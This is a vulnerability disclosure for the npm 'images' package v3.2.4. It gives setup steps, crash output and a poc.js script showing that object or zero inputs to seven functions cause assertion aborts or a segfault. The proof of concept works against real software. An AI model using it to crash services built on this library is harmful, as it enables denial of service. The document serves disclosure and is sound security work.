Denial of Service (DoS) in images@v3.2.4

01_Denial_of_Service_images@v3.2.4.md

Information

Package: images

Tested Version: 3.2.4

GitHub Repository: https://github.com/zhangyuanwei/node-images

Vulnerability: Denial of Service (DoS)

Details

Providing unexpected input types (like an object) to several different functions (see POC and output) makes it possible to reach an assert macro, leading to a process crash.

Also, by providing some specific integer values (like 0) to the size function, it is possible to obtain a Segmentation fault error, leading to the process crash.

Vulnerable code (multiple places):

• https://github.com/zhangyuanwei/node-images/blob/691d49f4e620b4eec9f1c47b1735841d9d8b55f6/src/Image.cc

Setup

Tested on:

Ubuntu 22.04.3 LTS
Node v18.19.0

• download an image (I took one from the same repo):

wget https://raw.githubusercontent.com/zhangyuanwei/node-images/master/test/input.png

• install the package:

npm i images

• if you get the error node: symbol lookup error: when running the poc.js, follow the instruction here https://github.com/zhangyuanwei/node-images/issues/260 - i.e download the zip file in the thread, unzip it and move it under ./vendor folder:

wget https://github.com/zhangyuanwei/node-images/files/12840099/linux-x64-binding.node.zip
unzip linux-x64-binding.node.zip -d ./node_modules/images/vendor/

PoC

Usage

node poc.js <poc1|poc2|poc2|poc3|poc4|poc5|poc6|poc7>

• poc1

node poc.js poc1
Running poc1
node: ../src/Image.cc:281: static napi_value__* Image::New(napi_env, napi_callback_info): Assertion `status == napi_ok' failed.
Aborted (core dumped)

• poc2

node poc.js poc2
Running poc2
node: ../src/Image.cc:333: static napi_value__* Image::SetWidth(napi_env, napi_callback_info): Assertion `status == napi_ok' failed.
Aborted (core dumped)

• poc3

node poc.js poc3
Running poc3
node: ../src/Image.cc:372: static napi_value__* Image::SetHeight(napi_env, napi_callback_info): Assertion `status == napi_ok' failed.
Aborted (core dumped)

• poc4

node poc.js poc4
Running poc4
node: ../src/Image.cc:398: static napi_value__* Image::Resize(napi_env, napi_callback_info): Assertion `status == napi_ok' failed.
Aborted (core dumped)

• poc5

node poc.js poc5
Running poc5
node: ../src/Image.cc:442: static napi_value__* Image::Rotate(napi_env, napi_callback_info): Assertion `status == napi_ok' failed.
Aborted (core dumped)

• poc6

node poc.js poc6
Running poc6
node: ../src/Image.cc:486: static napi_value__* Image::FillColor(napi_env, napi_callback_info): Assertion `status == napi_ok' failed.
Aborted (core dumped)

• poc7

node poc.js poc7
Running poc7
Segmentation fault (core dumped)

Impact

Denial of Service (DoS)

Author

Alessio Della Libera

poc.js

const images = require('images');


const input_image = './input.png';
const input = {};

function poc1() {
    console.log('Running poc1');
    images(input); 
}

function poc2() {
    console.log('Running poc2');
    images(input_image).width(input);
}

function poc3() {
    console.log('Running poc3');
    images(input_image).height(input);
}

function poc4() {
    console.log('Running poc4');
    images(input_image).resize(input);
}

function poc5() {
    console.log('Running poc5');
    images(input_image).rotate(input);
}

function poc6() {
    console.log('Running poc6');
    images(input_image).fill(input);
}

function poc7() {
    console.log('Running poc7');
    images(input_image).size(0);
}

const pocs = new Map();
pocs.set('poc1', poc1);
pocs.set('poc2', poc2);
pocs.set('poc3', poc3);
pocs.set('poc4', poc4);
pocs.set('poc5', poc5);
pocs.set('poc6', poc6);
pocs.set('poc7', poc7);


function run() {
    const args = process.argv.slice(2);
    const p = args[0];
    const poc = pocs.get(p) || poc1;

    try {
        poc();
    } catch (e) {
        console.log('Never executed')
        console.log(e);
    }
    
    console.log('Never executed')
}

run();